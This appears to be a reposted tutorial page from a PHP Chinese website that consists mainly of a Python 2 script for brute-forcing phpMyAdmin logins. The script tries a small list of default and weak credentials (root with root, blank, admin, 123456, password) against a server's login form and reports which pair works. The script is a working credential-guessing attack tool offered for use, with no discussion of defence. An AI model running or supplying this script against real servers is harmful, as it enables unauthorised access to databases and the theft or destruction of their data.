Home>Article>Database> About PHPMyAdmin weak password guessing

About PHPMyAdmin weak password guessing

藏色散人
藏色散人 forward
2021-05-27 15:55:13 3821browse

The following tutorial column ofphpmyadminwill introduce to you about guessing weak passwords for PHPMyAdmin. I hope it will be helpful to friends in need!

PHPMyAdmin Weak Password Guessing [Python Script]

PHPMyAdmin Weak Password Guessing

Test Screenshot:

Code Snippet

#! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import time username_list=['root'] password_list=['root','','admin','123456','password'] def phpMyAdmin(ip,port=80): for username in username_list: username =username.rstrip() for password in password_list: password = password.rstrip() try: #url = "http://192.168.106.141/phpmyadmin/index.php" url = "http://"+ip+":"+str(port)+"/phpmyadmin/index.php" data={'pma_username':username,'pma_password':password} response = requests.post(url,data=data,timeout=5) result=response.content if result.find('name="login_form"')==-1: print '====================================================' print '[+] find phpMyAdmin weak password:'+username,password print '====================================================' break else: print '[-] Checking for '+username,password+" fail" except: print '[-] Something Error'+username,password+" fail" if __name__ == '__main__': phpMyAdmin("192.168.106.141")

The above is the detailed content of About PHPMyAdmin weak password guessing. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:csdn.net. If there is any infringement, please contact admin@php.cn delete